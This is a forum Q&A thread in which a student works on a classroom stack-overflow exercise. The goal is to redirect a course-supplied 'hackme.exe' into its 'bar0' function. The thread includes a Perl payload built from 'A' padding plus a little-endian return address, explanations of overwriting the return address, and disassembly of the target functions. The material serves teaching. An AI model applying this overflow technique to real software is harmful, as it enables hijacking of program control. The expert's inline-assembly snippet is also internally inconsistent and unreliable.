darence
asked on
C++ : Change Stack Address
Hi!
I have doing a school project.. Stack Overrun.
I have a address of: 00401D00
I managed to find the last pointer.
Now i intend to write the pointer to the address.
Any idea?
My lecture notes somehow using perl..
converted "\x28\x13\x40" to an address: 401328
Please advice.
Cheers!
Darence
I have doing a school project.. Stack Overrun.
I have a address of: 00401D00
I managed to find the last pointer.
Now i intend to write the pointer to the address.
Any idea?
My lecture notes somehow using perl..
converted "\x28\x13\x40" to an address: 401328
Please advice.
Cheers!
Darence
what are you exactly trying to do ?
you have to use assembly language to achieve the result and it is not recommended to do so except in very very rare cases. eg exception handling where the language does not provide support for it. another is code related to powering on and off. another one is inside a debugger. and you have to be ***extremely*** careful of what you are doing because the return address of/to the caller code is stored on the stack. even main() gets called from somewhere else. i hope that is enough of a warning/discouragement to avoid the usage. anyways here is one way to do it. it is in MSVC environment and for x86 based processors.
void foo() {
// some code
int my_esp = 0x00401328; // assuming short is 16 bits
__asm mov esp, tmp_esp;
return;
}
void foo() {
// some code
int my_esp = 0x00401328; // assuming short is 16 bits
__asm mov esp, tmp_esp;
return;
}
ASKER
I am trying to get the find the return address, change the address to some place.
In this case, its 00401D00.
I managed to find the return address, except how to point it to 00401D00.
Think need to find the assembly language to point to 00401D00.
In this case, its 00401D00.
I managed to find the return address, except how to point it to 00401D00.
Think need to find the assembly language to point to 00401D00.
Sorry, I misunderstood the question.
Ok, so you want to change the return address that is stored on the stack to 0x00401D00. First thing that you would need to do is find where the ret addr for current function is stored, i.e. the location on stack which stores IP where we would go after exiting current function if we don't fiddle with it manually. Then you store 0x00401D00 to that location. free up any dynamic memory that you need to. and return.
Ok, so you want to change the return address that is stored on the stack to 0x00401D00. First thing that you would need to do is find where the ret addr for current function is stored, i.e. the location on stack which stores IP where we would go after exiting current function if we don't fiddle with it manually. Then you store 0x00401D00 to that location. free up any dynamic memory that you need to. and return.
ASKER
Dear jhshukla..
How can i "store" 0x00401D00 into it?
Is it just AAAAAAAAA."0x00401D00"?
How can i "store" 0x00401D00 into it?
Is it just AAAAAAAAA."0x00401D00"?
Darence, what processor architecture are you coding for?
Let's say you determine that return address for current function is 0x01234567. How did you figure it out? what memory location did you read to get the information? let's call (i.e. name) that memory location 'ret_addr_loc'. now what you do is overwrite the 32bit value (0x01234567) at that location with the new value (0x00401D00).
for x86 based processors the assembly code is
mov [ret_addr_loc], 0x00401D00
depending on what compiler you are using the ways to incorporate assembly code into C++ code will differ. look up the documentation for your compiler.
Let's say you determine that return address for current function is 0x01234567. How did you figure it out? what memory location did you read to get the information? let's call (i.e. name) that memory location 'ret_addr_loc'. now what you do is overwrite the 32bit value (0x01234567) at that location with the new value (0x00401D00).
for x86 based processors the assembly code is
mov [ret_addr_loc], 0x00401D00
depending on what compiler you are using the ways to incorporate assembly code into C++ code will differ. look up the documentation for your compiler.
ASKER
I am using DEV-C++
Output is a .exe file.
From my sample assignment,
To get the address: 401328.
they use: "\x28\x13\x40"
Please advice.
Cheers!
Darence
Output is a .exe file.
From my sample assignment,
To get the address: 401328.
they use: "\x28\x13\x40"
Please advice.
Cheers!
Darence
can you post the code snippet?
The machine you are using is little-endian. see http://en.wikipedia.org/wiki/Endianness for details. basically, in the group of four bytes the least significant byte is stored first, then the next significant and so on. e.g. while you write 0x2357 (two bytes) as 00100011 01010111 in binary it is stored as 01010111 00100011 i.e. 0x57 0x23 in memory. So, your string when interpreted as int becomes 0x401328. now recall the fact that C-style strings are null terminated. that adds a zero at the end making a total of 4 bytes, x28 x13 x40 x00. this becomes 0x00401328 when interpreted as an integer.
The machine you are using is little-endian. see http://en.wikipedia.org/wiki/Endianness for details. basically, in the group of four bytes the least significant byte is stored first, then the next significant and so on. e.g. while you write 0x2357 (two bytes) as 00100011 01010111 in binary it is stored as 01010111 00100011 i.e. 0x57 0x23 in memory. So, your string when interpreted as int becomes 0x401328. now recall the fact that C-style strings are null terminated. that adds a zero at the end making a total of 4 bytes, x28 x13 x40 x00. this becomes 0x00401328 when interpreted as an integer.
ASKER
http://www.mediamax.com/darenceang/Hosted/hackme.rar
I am given this EXE file.
Main thing is using a perl file to invoke the illegal BAR function..
Upon executing, the BAR address will be shown.
I am supposed to find the numbers of A ( being 41 ) before it goes to the return function.
I calculated it to be 20 A.. but now i do not know how to make the program GO to the bar address.
The syntax of using it is : hackme 3219914 AAAAAAAAAAblah blah blah..
If you manage to "change" the return address to BAR.
You should get a MSG saying I HAVE BEEN HACKED.
Cheers!
Darence
I am given this EXE file.
Main thing is using a perl file to invoke the illegal BAR function..
Upon executing, the BAR address will be shown.
I am supposed to find the numbers of A ( being 41 ) before it goes to the return function.
I calculated it to be 20 A.. but now i do not know how to make the program GO to the bar address.
The syntax of using it is : hackme 3219914 AAAAAAAAAAblah blah blah..
If you manage to "change" the return address to BAR.
You should get a MSG saying I HAVE BEEN HACKED.
Cheers!
Darence
ASKER
This is a sample of the perl file i am talking about.
$arg = "3219914 AAAAAAAAAAAAAAAAAAAA"."\x5 0\x1E\x40" ;
$cmd = "hackme ".$arg;
system($cmd);
It seems that IF i use this "\x50\x1E\x40";
I am able to get into a BAR4 FUNCTION..
Which should not be the case as i should be getting into a BAR function..
$arg = "3219914 AAAAAAAAAAAAAAAAAAAA"."\x5
$cmd = "hackme ".$arg;
system($cmd);
It seems that IF i use this "\x50\x1E\x40";
I am able to get into a BAR4 FUNCTION..
Which should not be the case as i should be getting into a BAR function..
you should be getting inside bar0 function. Get XVI32 from http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm. No installation is required. just unzip ALL files into one directory & run xvi32.exe. Open hackme.exe from it and search for "I have been hacked". You will find that the string preceding it is "Inside bar0 function. \n"
ASKER
Ok..
I found it..
So what can i do?
This program is supposed to GET INTO bar0 function.
But IF i knoe the address, how am i going to "translate" that into whatever language is x50\x1E\x40.... :)
I found it..
So what can i do?
This program is supposed to GET INTO bar0 function.
But IF i knoe the address, how am i going to "translate" that into whatever language is x50\x1E\x40.... :)
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
bar0:
hackme.exe Section .text (0x00401000)
0x401C90: 55 PUSH EBP ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)
0x401C91: 89E5 MOV EBP,ESP
0x401C93: 83EC08 SUB ESP,0x8
0x401C96: 83C4F8 ADD ESP,0xF8
0x401C99: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401C9E: 83C4F8 ADD ESP,0xF8 ; <==0x00401C6C(*-0x32)
0x401CA1: 68631C4000 PUSH 0x401C63 ; .text:Inside bar0 function. |
0x401CA6: 6828304100 PUSH 0x413028 ; .data:,0A
0x401CAB: E8FC1E0000 CALL 0x403BAC
0x401CB0: 83C410 ADD ESP,0x10
0x401CB3: 89C0 MOV EAX,EAX
0x401CB5: 50 PUSH EAX
0x401CB6: E8B5F90000 CALL 0x411670
0x401CBB: 83C410 ADD ESP,0x10
0x401CBE: 83C4F8 ADD ESP,0xF8
0x401CC1: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401CC6: 83C4F8 ADD ESP,0xF8
0x401CC9: 687B1C4000 PUSH 0x401C7B ; .text:I have been hacked!|
0x401CCE: 6828304100 PUSH 0x413028 ; .data:,0A
0x401CD3: E8D41E0000 CALL 0x403BAC
0x401CD8: 83C410 ADD ESP,0x10
0x401CDB: 89C0 MOV EAX,EAX
0x401CDD: 50 PUSH EAX
0x401CDE: E88DF90000 CALL 0x411670
0x401CE3: 83C410 ADD ESP,0x10
0x401CE6: C9 LEAVE
0x401CE7: C3 RET
bar4:
hackme.exe Section .text (0x00401000)
0x401E50: 55 PUSH EBP ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)
0x401E51: 89E5 MOV EBP,ESP
0x401E53: 83EC08 SUB ESP,0x8
0x401E56: 83C4F8 ADD ESP,0xF8
0x401E59: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401E5E: 83C4F8 ADD ESP,0xF8
0x401E61: 68381E4000 PUSH 0x401E38 ; .text:Inside bar4 function. |
0x401E66: 6828304100 PUSH 0x413028 ; .data:,0A
0x401E6B: E83C1D0000 CALL 0x403BAC
0x401E70: 83C410 ADD ESP,0x10
0x401E73: 89C0 MOV EAX,EAX
0x401E75: 50 PUSH EAX
0x401E76: E8F5F70000 CALL 0x411670
0x401E7B: 83C410 ADD ESP,0x10
0x401E7E: 83C4F8 ADD ESP,0xF8
0x401E81: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401E86: 83C4F8 ADD ESP,0xF8
0x401E89: 687B1C4000 PUSH 0x401C7B ; .text:I have been hacked!|
0x401E8E: 6828304100 PUSH 0x413028 ; .data:,0A
0x401E93: E8141D0000 CALL 0x403BAC
0x401E98: 83C410 ADD ESP,0x10
0x401E9B: 89C0 MOV EAX,EAX
0x401E9D: 50 PUSH EAX
0x401E9E: E8CDF70000 CALL 0x411670
0x401EA3: 83C410 ADD ESP,0x10
0x401EA6: C9 LEAVE
0x401EA7: C3 RET
hackme.exe Section .text (0x00401000)
0x401C90: 55 PUSH EBP ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)
0x401C91: 89E5 MOV EBP,ESP
0x401C93: 83EC08 SUB ESP,0x8
0x401C96: 83C4F8 ADD ESP,0xF8
0x401C99: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401C9E: 83C4F8 ADD ESP,0xF8 ; <==0x00401C6C(*-0x32)
0x401CA1: 68631C4000 PUSH 0x401C63 ; .text:Inside bar0 function. |
0x401CA6: 6828304100 PUSH 0x413028 ; .data:,0A
0x401CAB: E8FC1E0000 CALL 0x403BAC
0x401CB0: 83C410 ADD ESP,0x10
0x401CB3: 89C0 MOV EAX,EAX
0x401CB5: 50 PUSH EAX
0x401CB6: E8B5F90000 CALL 0x411670
0x401CBB: 83C410 ADD ESP,0x10
0x401CBE: 83C4F8 ADD ESP,0xF8
0x401CC1: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401CC6: 83C4F8 ADD ESP,0xF8
0x401CC9: 687B1C4000 PUSH 0x401C7B ; .text:I have been hacked!|
0x401CCE: 6828304100 PUSH 0x413028 ; .data:,0A
0x401CD3: E8D41E0000 CALL 0x403BAC
0x401CD8: 83C410 ADD ESP,0x10
0x401CDB: 89C0 MOV EAX,EAX
0x401CDD: 50 PUSH EAX
0x401CDE: E88DF90000 CALL 0x411670
0x401CE3: 83C410 ADD ESP,0x10
0x401CE6: C9 LEAVE
0x401CE7: C3 RET
bar4:
hackme.exe Section .text (0x00401000)
0x401E50: 55 PUSH EBP ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)
0x401E51: 89E5 MOV EBP,ESP
0x401E53: 83EC08 SUB ESP,0x8
0x401E56: 83C4F8 ADD ESP,0xF8
0x401E59: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401E5E: 83C4F8 ADD ESP,0xF8
0x401E61: 68381E4000 PUSH 0x401E38 ; .text:Inside bar4 function. |
0x401E66: 6828304100 PUSH 0x413028 ; .data:,0A
0x401E6B: E83C1D0000 CALL 0x403BAC
0x401E70: 83C410 ADD ESP,0x10
0x401E73: 89C0 MOV EAX,EAX
0x401E75: 50 PUSH EAX
0x401E76: E8F5F70000 CALL 0x411670
0x401E7B: 83C410 ADD ESP,0x10
0x401E7E: 83C4F8 ADD ESP,0xF8
0x401E81: 6810404000 PUSH 0x404010 ; .text:0x55 0x89 0xE5 0x83
0x401E86: 83C4F8 ADD ESP,0xF8
0x401E89: 687B1C4000 PUSH 0x401C7B ; .text:I have been hacked!|
0x401E8E: 6828304100 PUSH 0x413028 ; .data:,0A
0x401E93: E8141D0000 CALL 0x403BAC
0x401E98: 83C410 ADD ESP,0x10
0x401E9B: 89C0 MOV EAX,EAX
0x401E9D: 50 PUSH EAX
0x401E9E: E8CDF70000 CALL 0x411670
0x401EA3: 83C410 ADD ESP,0x10
0x401EA6: C9 LEAVE
0x401EA7: C3 RET
btw, i just figured that 0x00401D00 is bar1. are you, by any chance, trying to return to bar1 from bar0?